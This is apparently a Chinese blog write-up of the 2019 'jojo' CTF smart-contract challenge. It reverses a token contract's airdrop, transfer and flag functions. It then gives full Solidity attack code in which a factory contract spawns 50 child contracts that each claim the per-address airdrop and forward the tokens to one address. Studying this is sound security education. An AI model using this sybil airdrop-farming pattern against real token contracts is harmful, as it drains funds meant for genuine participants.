pikachu's Blog

数字经济2019 jojo

前言

  • 需要逆向
  • 满足 require 即可
// Listing reconstructed by reversing the challenge contract; names are the
// write-up author's, not necessarily those of the deployed source.
//
// Emits SendFlag(b64email) when the caller's token balance is at least 100000.
// The balance comparison is the only gate here, so the flag is exactly as well
// protected as the rules that let an address accumulate balance (gift/transfer).
function payforflag(string b64email) public {
    require(100000 <= balanceOf[msg.sender]);
    emit SendFlag(b64email);
}
  • gift 空投函数
// Airdrop: credits 100 tokens to the caller the first time an address calls it.
//
// NOTE(review): in this reversed listing the mapping and the function share the
// name `gift`; a Solidity compiler rejects that, so the deployed source must use
// different identifiers. Treat the names as decompiler pseudo-code.
//
// Security point: the one-claim limit is keyed on msg.sender only. An address is
// not an identity, and contract addresses are accepted like any other caller, so
// the flag bounds claims per address, not per participant. Limiting an airdrop
// per participant needs something bound off-chain, such as an allow-list or a
// signed claim.
function gift() public {
    address claimant = msg.sender;
    // assert (not require) is what the listing shows; kept as-is.
    assert(gift[claimant] == 0);
    gift[claimant] = 1;
    balanceOf[claimant] += 100;
}
  • 转账函数
// Moves `value` tokens from the caller to `to`.
//
// The balance check runs before the subtraction, so the debit cannot underflow.
// The credit to `to` is a plain unchecked addition. Any address may receive
// tokens, which is what lets balances claimed by many addresses be pooled into
// one account.
function transfer(address to, uint value) public {
    address sender = msg.sender;
    assert(value <= balanceOf[sender]);
    // Debit before credit, as in the listing (matters when sender == to).
    balanceOf[sender] -= value;
    balanceOf[to] += value;
}
  • 转账函数在扣款前先检查了余额,无法利用整型溢出,所以需要另想办法
  • 薅羊毛攻击:通过建立多个子合约领取空投,然后转账给固定账户,使该账户余额满足 payforflag 的 require 条件
// Thin caller for the challenge contract's payforflag().
//
// payforflag() checks balanceOf[msg.sender]; when it is called through this
// contract, msg.sender inside the target is this contract's address, not the
// externally owned account that sent the transaction.
// NOTE(review): presumably the recipient address hard-coded in `son` is where
// this contract was deployed; the write-up does not say, confirm before relying
// on it.
contract hack {
    // Address of the challenge instance, as given in the write-up.
    address instance_address = 0xd86ed76112295a07c675974995b9805912282eb3;
    jojo target = jojo(instance_address);

    // Forwards the base64-encoded e-mail string to the target's payforflag().
    function hack1(string b64email) public {
        jojo token = target;
        token.payforflag(b64email);
    }
}

// Factory that deploys `son` contracts in a batch.
contract father {
    // Deploys 50 `son` instances. All the work happens in each son's
    // constructor (one gift() claim of 100 plus one transfer of 100), so a
    // single call pools 50 * 100 tokens at the recipient hard-coded in `son`.
    // The deployed instances are not used afterwards, so no reference is kept.
    function attack() public {
        uint spawned = 0;
        while (spawned < 50) {
            new son();
            spawned++;
        }
    }
}

// Single-use claimer: everything runs in the constructor.
//
// Each deployment has a fresh address, so the target's per-address gift flag
// is still 0 for it. This shows why that flag does not limit claims per
// participant.
contract son {
    constructor() public {
        // Challenge instance address, as given in the write-up.
        jojo token = jojo(0xd86ed76112295a07c675974995b9805912282eb3);
        // msg.sender seen by the target is this newly created contract.
        token.gift();
        // Forward the claimed 100 tokens to the fixed collecting address.
        token.transfer(0xafFE1Eeea46Ec23a87C7894d90Aa714552468cAF, 100);
    }
}

Author:pikachu
Link:https://hitcxy.com/2019/jojo/
Contact:hitcxy@hotmail.com
本文基于 知识共享署名-相同方式共享 4.0 国际许可协议发布
转载请注明出处,谢谢!